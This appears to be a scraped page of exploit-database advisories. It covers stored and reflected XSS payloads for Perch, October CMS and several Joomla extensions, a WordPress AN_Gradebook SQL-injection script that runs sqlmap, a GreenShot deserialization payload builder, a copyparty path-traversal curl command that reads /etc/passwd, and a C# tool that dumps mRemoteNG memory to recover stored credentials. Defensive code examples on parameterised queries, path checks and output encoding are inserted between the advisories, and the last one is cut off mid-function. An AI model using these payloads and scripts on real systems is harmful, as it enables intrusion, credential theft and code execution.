All posts published by ISHACK AI BOT
-
Perch v3.2 - Persistent Cross Site Scripting (XSS)
# Exploit Title: Perch v3.2 - Persistent Cross Site Scripting (XSS)
# Google Dork: N/A
# Date: 23-July-2023
# Exploit Author: Dinesh Mohanty
# Vendor Homepage: https://grabaperch.com/
# Software Link: https://grabaperch.com/download
# Version: v3.2
# Tested on: Windows
# CVE : Requested

# Description:
A Stored Cross Site Scripting (Stored XSS) vulnerability is found in the file upload functionality under the create asset section.

# Steps to Reproduce
The user needs to log in to the application and follow the steps below:

1. Log in to the application
2. From the left side menu go to Assets (http://URL/perch/core/apps/assets/)
3. Click on "Add assets" and fill in all other details (please note that not all the text fields are vulnerable to XSS, as they have output encoding)
4. Create an SVG file with the contents below, say xss.svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert("XSS");
   </script>
</svg>

5. In the File upload section upload the above SVG file and submit
6. Now go to the above SVG directly, say the file is xss.svg
7. Open the svg file (http://URL/perch/resources/xss.svg), or view all Assets and view the image
8. One can see that we got an XSS alert.
-
mooDating 1.2 - Reflected Cross-site scripting (XSS)
# Exploit Title: mooDating 1.2 - Reflected Cross-site scripting (XSS)
# Exploit Author: CraCkEr aka (skalvin)
# Date: 22/07/2023
# Vendor: mooSocial
# Vendor Homepage: https://moodatingscript.com/
# Software Link: https://demo.moodatingscript.com/home
# Version: 1.2
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-3849, CVE-2023-3848, CVE-2023-3847, CVE-2023-3846, CVE-2023-3843, CVE-2023-3845, CVE-2023-3844

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

Path: /matchmakings/question
URL parameter is vulnerable to RXSS

https://website/matchmakings/questiontmili%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ew71ch?number=
https://website/matchmakings/question[XSS]?number=

Path: /friends
URL parameter is vulnerable to RXSS

https://website/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3er5c3m/ajax_invite?mode=model
https://website/friends[XSS]/ajax_invite?mode=model

Path: /friends/ajax_invite
URL parameter is vulnerable to RXSS

https://website/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ef26v4?mode=model
https://website/friends/ajax_invite[XSS]?mode=model

Path: /pages
URL parameter is vulnerable to RXSS

https://website/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l
https://website/pages[XSS]/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l

Path: /users
URL parameter is vulnerable to RXSS

https://website/userszzjpp%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3eaycfc/view/108?tab=activity
https://website/user[XSS]/view/108?tab=activity

Path: /users/view
URL parameter is vulnerable to RXSS

https://website/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3el43yn/108?tab=activity
https://website/users/view[XSS]/108?tab=activity

Path: /find-a-match
URL parameter is vulnerable to RXSS

https://website/find-a-matchpksyk%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3es9a64?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0
https://website/find-a-match[XSS]?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0

[XSS Payload]: pksyk"><img src=a onerror=alert(1)>s9a6

[-] Done
-
Joomla HikaShop 4.7.4 - Reflected XSS
# Exploit Title: Joomla HikaShop 4.7.4 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 24/07/2023
# Vendor: Hikari Software Team
# Vendor Homepage: https://www.hikashop.com/
# Software Link: https://demo.hikashop.com/index.php/en/
# Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/hikashop/
# Version: 4.7.4
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

Path: /index.php
GET parameter 'from_option' is vulnerable to RXSS

https://website/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=[XSS]&from_ctrl=product&from_task=listing&from_itemid=103

Path: /index.php
GET parameter 'from_ctrl' is vulnerable to RXSS

https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=[XSS]&from_task=listing&from_itemid=103

Path: /index.php
GET parameter 'from_task' is vulnerable to RXSS

https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=[XSS]&from_itemid=103

Path: /index.php
GET parameter 'from_itemid' is vulnerable to RXSS

https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=listing&from_itemid=[XSS]

[XSS Payload]: uhqum"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"wcn46

[-] Done
-
October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Exploit Title: October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 29 June 2023
# Exploit Author: Okan Kurtulus
# Vendor Homepage: https://octobercms.com
# Version: v3.4.4
# Tested on: Ubuntu 22.04
# CVE : N/A

# Proof of Concept:
1. Install the system through the website and log in with any user that has file upload authority.
2. Select "Media" in the top menu. Prepare an SVG file using the payload below.
3. Upload the SVG file and call the relevant file from the directory it is in. XSS will be triggered.

# Stored XSS Payload:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(1);
   </script>
</svg>
-
Joomla VirtueMart Shopping Cart 4.0.12 - Reflected XSS
# Exploit Title: Joomla VirtueMart Shopping-Cart 4.0.12 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 24/07/2023
# Vendor: VirtueMart Team
# Vendor Homepage: https://www.virtuemart.net/
# Software Link: https://demo.virtuemart.net/
# Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/virtuemart/
# Version: 4.0.12
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

Path: /product-variants
GET parameter 'keyword' is vulnerable to RXSS

https://website/product-variants?keyword=[XSS]&view=category&option=com_virtuemart&virtuemart_category_id=11&Itemid=925

[XSS Payload]: uk9ni"><script>alert(1)</script>a6di2

[-] Done
-
WordPress Plugin AN_Gradebook 5.0.1 - SQLi
#!/usr/bin/python3
# Exploit Title: WordPress Plugin AN_Gradebook <= 5.0.1 - Subscriber+ SQLi
# Date: 2023-07-26
# Exploit Author: Lukas Kinneberg
# Github: https://github.com/lukinneberg/CVE-2023-2636
# Vendor Homepage: https://wordpress.org/plugins/an-gradebook/
# Software Link: https://github.com/lukinneberg/CVE-2023-2636/blob/main/an-gradebook.7z
# Tested on: WordPress 6.2.2
# CVE: CVE-2023-2636

from datetime import datetime
import os
import requests
import json

# User Input:
target_ip = 'CHANGE_THIS'
target_port = '80'
username = 'hacker'
password = 'hacker'

banner = '''
 ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____
||C |||V |||E |||- |||2 |||0 |||2 |||3 |||- |||2 |||6 |||3 |||6 ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|

Exploit Author: Lukas Kinneberg
'''
print(banner)
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))

# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + '/wp-login.php'
check = session.get(auth_url)

# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)

# SQL-Injection (Exploit):
# Generate payload for sqlmap
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}', '')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')
cookie = cookie.replace(',', '; ')

print('[*] Payload for SQL-Injection:')
# Enter the URL path of the course after the target_port below
exploitcode_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + r'/wp-admin/admin-ajax.php?action=course&id=3" '
exploitcode_risk = '--level 2 --risk 2 '
exploitcode_cookie = '--cookie="' + cookie + '" '

# SQLMAP Printout
print(' Sqlmap options:')
print(' -a, --all           Retrieve everything')
print(' -b, --banner        Retrieve DBMS banner')
print(' --current-user      Retrieve DBMS current user')
print(' --current-db        Retrieve DBMS current database')
print(' --passwords         Enumerate DBMS users password hashes')
print(' --tables            Enumerate DBMS database tables')
print(' --columns           Enumerate DBMS database table column')
print(' --schema            Enumerate DBMS schema')
print(' --dump              Dump DBMS database table entries')
print(' --dump-all          Dump all DBMS databases tables entries')

retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + retrieve_mode + ' -p id -v 0 --answers="follow=Y" --batch'
os.system(exploitcode)

print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
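The defect behind this advisory is a request value (the `id` of the course) spliced into SQL text. As an added illustration, not the plugin's code or the author's script, the block below runs the same lookup both ways against a constructed in-memory SQLite schema; the table names, rows and the `course_*` function names are made up for the demonstration, and the comment on `$wpdb->prepare` names the WordPress equivalent of the fixed form.

```python
"""Parameterised vs. concatenated queries (added example; constructed schema)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed stand-in for the plugin's tables.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE courses (id INTEGER, name TEXT)")
    conn.execute("CREATE TABLE wp_users (user_login TEXT, user_pass TEXT)")
    conn.executemany("INSERT INTO courses VALUES (?, ?)",
                     [(3, "Algebra"), (4, "Physics")])
    conn.execute("INSERT INTO wp_users VALUES ('admin', 'constructed-hash')")
    conn.commit()
    return conn


def course_vulnerable(conn: sqlite3.Connection, course_id: str):
    # Defective pattern: the request value becomes part of the SQL text, so a
    # value such as "3 UNION ALL SELECT user_pass FROM wp_users" is run as SQL
    # and a column from an unrelated table comes back beside the course name.
    sql = "SELECT name FROM courses WHERE id = " + course_id
    return [row[0] for row in conn.execute(sql)]


def course_safe(conn: sqlite3.Connection, course_id):
    # Fixed pattern: the value is bound as a parameter, so the engine only ever
    # compares it against id; it cannot change the statement's structure.
    # The WordPress equivalent is $wpdb->prepare("... WHERE id = %d", $id).
    return [row[0] for row in conn.execute(
        "SELECT name FROM courses WHERE id = ?", (course_id,))]


def course_strict(conn: sqlite3.Connection, course_id: str):
    # Defence in depth: enforce the expected type before touching the database,
    # and reject (None) rather than query when it does not fit.
    try:
        cid = int(course_id)
    except (TypeError, ValueError):
        return None
    return course_safe(conn, cid)


if __name__ == "__main__":
    db = make_db()
    probe = "3 UNION ALL SELECT user_pass FROM wp_users"
    print("concatenated:", course_vulnerable(db, probe))
    print("parameterised:", course_safe(db, probe))
    print("type-checked:", course_strict(db, probe))
```

The parameterised form returns an empty result for the probe because SQLite compares the whole string against the integer column and finds no match; the strict form never reaches the database at all.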
-
GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution
# Exploit Title: GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution
# Date: 26/07/2023
# Exploit Author: p4r4bellum
# Vendor Homepage: https://getgreenshot.org
# Software Link: https://getgreenshot.org/downloads/
# Version: 1.2.6.10
# Tested on: windows 10.0.19045 N/A build 19045
# CVE : CVE-2023-34634
#
# GreenShot 1.2.10 and below is vulnerable to insecure object deserialization in its custom *.greenshot format.
# A stream of .Net objects is serialized and insecurely deserialized when a *.greenshot file is opened with the software.
# On a default install the *.greenshot file extension is associated with the program, so double-clicking a *.greenshot file
# will lead to arbitrary code execution.
#
# Generate the payload. You need ysoserial.net to be installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net
./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -c "calc" --outputpath payload.bin -o raw

# load the payload
$payload = Get-Content .\payload.bin -Encoding Byte
# retrieve the length of the payload
$length = $payload.Length
# load the required assembly to craft a PNG file
Add-Type -AssemblyName System.Drawing
# the following lines create a png file with some text.
# Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell
$filename = "$home\poc.greenshot"
$bmp = new-object System.Drawing.Bitmap 250,61
$font = new-object System.Drawing.Font Consolas,24
$brushBg = [System.Drawing.Brushes]::Green
$brushFg = [System.Drawing.Brushes]::Black
$graphics = [System.Drawing.Graphics]::FromImage($bmp)
$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)
$graphics.DrawString('POC Greenshot',$font,$brushFg,10,10)
$graphics.Dispose()
$bmp.Save($filename)
# append the payload to the PNG file
$payload | Add-Content -Path $filename -Encoding Byte -NoNewline
# append the length of the payload
[System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding Byte -NoNewline
# append the signature
"Greenshot01.02" | Add-Content -path $filename -NoNewline -Encoding Ascii
# launch greenshot. Calc.exe should be executed
Invoke-Item $filename
-
copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)
# Exploit Title: copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)
# Date: 23/07/2023
# Exploit Author: Vartamtezidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.6
# Version: <=1.8.6
# Tested on: Debian Linux
# CVE : CVE-2023-38501

# Description
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) attack. A vulnerability in the web interface of the application could allow an attacker to execute malicious JavaScript code by tricking users into accessing a malicious link.

# POC
https://localhost:3923/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E
-
copyparty 1.8.2 - Directory Traversal
# Exploit Title: copyparty 1.8.2 - Directory Traversal
# Date: 14/07/2023
# Exploit Author: Vartamtzidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2
# Version: <=1.8.2
# Tested on: Debian Linux
# CVE : CVE-2023-37474

# Description
Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability in the `.cpr` subfolder. The path traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.

# POC
curl -i -s -k -X GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'
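The two copyparty advisories above come down to two input checks a file server needs: a value echoed into a response header must not contain CR/LF (the `k304` PoC relies on `%0D%0A%0D%0A` ending the header block so that the rest of the value is rendered as the body), and a requested path must be decoded once and kept inside the served root (the `.cpr` PoC relies on an encoded `%2F` re-anchoring the path at `/`). The block below is an added example of both checks and is not copyparty's code; the function names and sample requests are constructed.

```python
"""Header-value and path-containment checks for a file server (added example)."""
from pathlib import Path, PurePosixPath
from urllib.parse import unquote


class BadRequest(ValueError):
    """Input that must be answered with 400 and never echoed back."""


def header_safe(value: str) -> str:
    # A value copied into a response header must not contain CR, LF or NUL:
    # CRLF CRLF ends the header block, and whatever follows becomes the body.
    if any(ch in value for ch in "\r\n\x00"):
        raise BadRequest("control character in header value")
    return value


def is_header_safe(value: str) -> bool:
    try:
        header_safe(value)
        return True
    except BadRequest:
        return False


def resolve_under_root(root: str, requested: str) -> Path:
    """Map a URL path component onto the filesystem, refusing anything that
    would leave `root`. Percent-encoding is decoded exactly once, so a
    double-encoded %252e%252e stays a literal file name and never becomes '..'."""
    root_path = Path(root).resolve()
    decoded = unquote(requested)
    if "\x00" in decoded:
        raise BadRequest("NUL in path")
    # An encoded slash (%2F) decoding to a leading '/' would re-anchor the path
    # at the filesystem root; only relative paths are meaningful here.
    if decoded.startswith(("/", "\\")):
        raise BadRequest("absolute path in request")
    parts = PurePosixPath(decoded).parts
    if any(p == ".." for p in parts):
        raise BadRequest("parent directory reference in request")
    candidate = root_path.joinpath(*parts).resolve()
    # resolve() follows symlinks, so a link that points outside root is caught too.
    if candidate != root_path and root_path not in candidate.parents:
        raise BadRequest("path escapes served root")
    return candidate


def request_allowed(root: str, requested: str) -> bool:
    try:
        resolve_under_root(root, requested)
        return True
    except BadRequest:
        return False


if __name__ == "__main__":
    # Constructed sample inputs, decoded forms of the PoCs above.
    print(is_header_safe("y"), is_header_safe("y\r\n\r\n<img src=copyparty onerror=alert(1)>"))
    for req in ("docs/readme.txt", "%2Fetc%2Fpasswd", "../../etc/passwd"):
        print(req, request_allowed(".", req))
```

Rejecting with a 400 rather than "fixing" the value matters for both checks: stripping CR/LF or collapsing `..` silently invites the next encoding trick, while a hard reject is easy to log and alert on.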
-
mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory
# Exploit Title: mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory
# Google Dork: -
# Date: 21.07.2023
# Exploit Author: Maximilian Barz
# Vendor Homepage: https://mremoteng.org/
# Software Link: https://mremoteng.org/download
# Version: mRemoteNG <= v1.77.3.1784-NB
# Tested on: Windows 11
# CVE : CVE-2023-30367

/*
Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users to store and manage multi-protocol connection configurations to remotely connect to systems. mRemoteNG configuration files can be stored in an encrypted state on disk.

mRemoteNG version <= v1.76.20 and <= 1.77.3-dev loads configuration files in plain text into memory (after decrypting them if necessary) at application start-up, even if no connection has been established yet. This allows attackers to access the contents of configuration files in plain text through a memory dump and thus compromise user credentials when no custom password encryption key has been set. This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory.

Full exploit and mRemoteNG config file decryption + password bruteforce python script: https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper
*/

using System;
using System.Collections;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;

namespace mRemoteNGDumper
{
    public static class Program
    {
        public enum MINIDUMP_TYPE
        {
            MiniDumpWithFullMemory = 0x00000002
        }

        [StructLayout(LayoutKind.Sequential, Pack = 4)]
        public struct MINIDUMP_EXCEPTION_INFORMATION
        {
            public uint ThreadId;
            public IntPtr ExceptionPointers;
            public int ClientPointers;
        }

        [DllImport("kernel32.dll")]
        static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);

        [DllImport("Dbghelp.dll")]
        static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, SafeHandle hFile, MINIDUMP_TYPE DumpType, ref MINIDUMP_EXCEPTION_INFORMATION ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);

        static void Main(string[] args)
        {
            string input;
            bool configfound = false;
            StringBuilder filesb;
            StringBuilder linesb;
            List<string> configs = new List<string>();

            Process[] localByName = Process.GetProcessesByName("mRemoteNG");
            if (localByName.Length == 0)
            {
                Console.WriteLine("[-] No mRemoteNG process was found. Exiting");
                System.Environment.Exit(1);
            }

            string assemblyPath = Assembly.GetEntryAssembly().Location;
            Console.WriteLine("[+] Creating a memory dump of mRemoteNG using PID {0}.", localByName[0].Id);
            string dumpFileName = assemblyPath + "_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm.ss") + ".dmp";
            FileStream procdumpFileStream = File.Create(dumpFileName);
            MINIDUMP_EXCEPTION_INFORMATION info = new MINIDUMP_EXCEPTION_INFORMATION();

            // A full memory dump is necessary in the case of a managed application, otherwise no information
            // regarding the managed code will be available
            MINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory;
            MiniDumpWriteDump(localByName[0].Handle, (uint)localByName[0].Id, procdumpFileStream.SafeFileHandle, DumpType, ref info, IntPtr.Zero, IntPtr.Zero);
            procdumpFileStream.Close();

            filesb = new StringBuilder();
            Console.WriteLine("[+] Searching for configuration files in memory dump.");
            using (StreamReader reader = new StreamReader(dumpFileName))
            {
                while (reader.Peek() >= 0)
                {
                    input = reader.ReadLine();
                    string pattern = @"(\<Node)(.*)(?=\/>)\/>";
                    Match m = Regex.Match(input, pattern, RegexOptions.IgnoreCase);
                    if (m.Success)
                    {
                        configfound = true;
                        foreach (string config in m.Value.Split('>'))
                        {
                            configs.Add(config);
                        }
                    }
                }
                reader.Close();

                if (configfound)
                {
                    string currentDir = System.IO.Directory.GetCurrentDirectory();
                    string dumpdir = currentDir + "/dump";
                    if (!Directory.Exists(dumpdir))
                    {
                        Directory.CreateDirectory(dumpdir);
                    }
                    string savefilepath;
                    for (int i = 0; i < configs.Count; i++)
                    {
                        if (!string.IsNullOrEmpty(configs[i]))
                        {
                            savefilepath = currentDir + "\\dump\\extracted_Configfile_mRemoteNG_" + i + "_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml";
                            Console.WriteLine("[+] Saving extracted configuration file to: " + savefilepath);
                            using (StreamWriter writer = new StreamWriter(savefilepath))
                            {
                                writer.Write(configs[i] + '>');
                                writer.Close();
                            }
                        }
                    }
                    Console.WriteLine("[+] Done!");
                    Console.WriteLine("[+] Deleting memorydump file!");
                    File.Delete(dumpFileName);
                    Console.WriteLine("[+] To decrypt mRemoteNG configuration files and get passwords in cleartext, execute: mremoteng_decrypt.py\r\n Example: python3 mremoteng_decrypt.py -rf \"" + currentDir + "\\dump\\extracted_Configfile_mRemoteNG_0_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml\"");
                }
                else
                {
                    Console.WriteLine("[-] No configuration file found in memorydump. Exiting");
                    Console.WriteLine("[+] Deleting memorydump file!");
                    File.Delete(dumpFileName);
                }
            }
        }
    }
}
-
Joomla Solidres 2.13.3 - Reflected XSS
# Exploit Title: Joomla Solidres 2.13.3 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 28/07/2023
# Vendor: Solidres Team
# Vendor Homepage: http://solidres.com/
# Software Link: https://extensions.joomla.org/extension/vertical-markets/booking-a-reservations/solidres/
# Demo: http://demo.solidres.com/joomla
# Version: 2.13.3
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

GET parameter 'show' is vulnerable to XSS
GET parameter 'reviews' is vulnerable to XSS
GET parameter 'type_id' is vulnerable to XSS
GET parameter 'distance' is vulnerable to XSS
GET parameter 'facilities' is vulnerable to XSS
GET parameter 'categories' is vulnerable to XSS
GET parameter 'prices' is vulnerable to XSS
GET parameter 'location' is vulnerable to XSS
GET parameter 'Itemid' is vulnerable to XSS

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=[XSS]
https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&reviews=[XSS]&facilities=18&
https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=[XSS]
https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=[XSS]&facilities=14
https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=[XSS]
https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-25&distance=0-25&categories=[XSS]
https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=d2tff&ordering=distance&direction=asc&prices=[XSS]
https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=[XSS]&task=hub.search&ordering=score&direction=desc&type_id=11
https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=[XSS]&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=14

[-] Done
-
Joomla iProperty Real Estate 4.1.1 - Reflected XSS
# Exploit Title: Joomla iProperty Real Estate 4.1.1 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 29/07/2023
# Vendor: The Thinkery LLC
# Vendor Homepage: http://thethinkery.net
# Software Link: https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/
# Demo: https://iproperty.thethinkery.net/
# Version: 4.1.1
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

Path: /iproperty/property-views/all-properties-with-map
GET parameter 'filter_keyword' is vulnerable to XSS

https://website/iproperty/property-views/all-properties-with-map?filter_keyword=[XSS]&option=com_iproperty&view=allproperties&ipquicksearch=1

XSS Payload: pihil"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"f63m4

[-] Done
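Every reflected-XSS advisory on this page (mooDating, HikaShop, VirtueMart, Solidres, iProperty) has the same root cause: a query or path parameter is written back into the page without encoding for the HTML context it lands in. The block below is an added example and not the code of any of those components. It encodes the two payloads quoted above for a text node and for a quoted attribute, handles the URL context where encoding alone is not enough, and runs a small detector over constructed access-log lines so that probing for these parameters shows up in monitoring; the `render_*` names, templates and log lines are all constructed.

```python
"""Context-aware output encoding for reflected parameters, plus a log check
for the probe patterns seen in these advisories (added example)."""
import html
import re
from urllib.parse import unquote

# Payloads quoted in the advisories above (mooDating and HikaShop).
PROBE_IMG = 'pksyk"><img src=a onerror=alert(1)>s9a6'
PROBE_ATTR = ('uhqum"onmouseover="alert(1)"style="position:absolute;'
              'width:100%;height:100%;top:0;left:0;"wcn46')


def render_text(keyword: str) -> str:
    # HTML body context: <, >, &, " and ' are all encoded, so no tag can start.
    return "<p>Results for: " + html.escape(keyword, quote=True) + "</p>"


def render_attr(keyword: str) -> str:
    # Quoted attribute context: the encoded quote cannot close the attribute,
    # so onmouseover=... remains inert text inside value="...".
    return '<input name="keyword" value="' + html.escape(keyword, quote=True) + '">'


def render_href(next_url: str) -> str:
    # URL context: escaping does not stop a javascript: URL, so the scheme is
    # restricted first (same-origin path or https), then the value is escaped.
    ok = (next_url.startswith("/") and not next_url.startswith("//")) \
        or next_url.startswith("https://")
    if not ok:
        next_url = "/"
    return '<a href="' + html.escape(next_url, quote=True) + '">back</a>'


# Markers common to the payloads above; matched against the decoded request.
PROBE_RE = re.compile(
    r"<\s*(script|img|svg|iframe)\b|on(error|load|mouseover)\s*=|javascript:", re.I)


def flag_reflected_xss(log_lines):
    """Return the request targets whose percent-decoded form carries a probe."""
    hits = []
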